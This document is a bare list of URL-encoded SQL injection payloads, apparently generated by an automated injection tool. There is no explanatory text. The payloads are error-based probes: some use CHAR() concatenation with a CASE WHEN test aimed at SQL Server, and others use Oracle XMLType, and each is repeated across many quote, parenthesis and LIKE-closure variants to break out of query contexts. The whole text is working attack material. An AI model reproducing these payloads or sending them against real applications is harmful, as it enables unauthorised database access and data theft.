1%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%284935%3D4935 1%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%283865%3D3865 1%29%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%285530%3D5530 1%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27YvEp%27%3D%27YvEp 1%27%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27LFyt%27%3D%27LFyt 1%27%29%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27lrbd%27%3D%27lrbd 1%27%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27Ixot%27%3D%27Ixot 1%27%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27cRVh%27%20LIKE%20%27cRVh 1%27%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27jeBa%27%20LIKE%20%27jeBa 1%27%29%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27bRBl%27%20LIKE%20%27bRBl 1%27%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%27htgJ%27%20LIKE%20%27htgJ 1%22%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22WgKN%22%3D%22WgKN 1%22%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22nHdM%22%3D%22nHdM 1%22%29%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22ESWq%22%3D%22ESWq 1%22%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22NizJ%22%3D%22NizJ 1%22%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%22atJr%22%20LIKE%20%22atJr 1%22%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22AklA%22%20LIKE%20%22AklA 1%22%29%29%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22GjOi%22%20LIKE%20%22GjOi 1%22%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%22yzBN%22%20LIKE%20%22yzBN 1%29%20WHERE%202478%3D2478%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%29%20WHERE%205377%3D5377%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%20WHERE%203809%3D3809%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%22%20WHERE%208360%3D8360%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29 1%27%20%7C%7C%20%28SELECT%201570%20FROM%20DUAL%20WHERE%201425%3D1425%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202175%20WHERE%206055%3D6055%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208756%20FROM%20DUAL%20WHERE%207785%3D7785%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29 1%20%2B%20%28SELECT%206857%20WHERE%201069%3D1069%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29 1%27%20%2B%20%28SELECT%20%27rVwU%27%20FROM%20DUAL%20WHERE%201081%3D1081%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mCLi%27%20WHERE%201663%3D1663%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204207%20IN%20%28%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2897%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284207%3D4207%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20%23 1%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%22%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%281517%3D1517 1%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%289557%3D9557 1%29%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%285880%3D5880 1%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27fMNe%27%3D%27fMNe 1%27%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27BnSy%27%3D%27BnSy 1%27%29%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27HrLh%27%3D%27HrLh 1%27%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27WGDd%27%3D%27WGDd 1%27%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27YlMP%27%20LIKE%20%27YlMP 1%27%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27zFlB%27%20LIKE%20%27zFlB 1%27%29%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27amaA%27%20LIKE%20%27amaA 1%27%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27CaYR%27%20LIKE%20%27CaYR 1%22%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22YTfq%22%3D%22YTfq 1%22%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22JYHj%22%3D%22JYHj 1%22%29%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22FLmm%22%3D%22FLmm 1%22%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22jrSK%22%3D%22jrSK 1%22%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22xjLw%22%20LIKE%20%22xjLw 1%22%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22hFGY%22%20LIKE%20%22hFGY 1%22%29%29%29%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22rAbn%22%20LIKE%20%22rAbn 1%22%20AND%207172%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2897%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287172%3D7172%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22mSIB%22%20LIKE%20%22mSIB 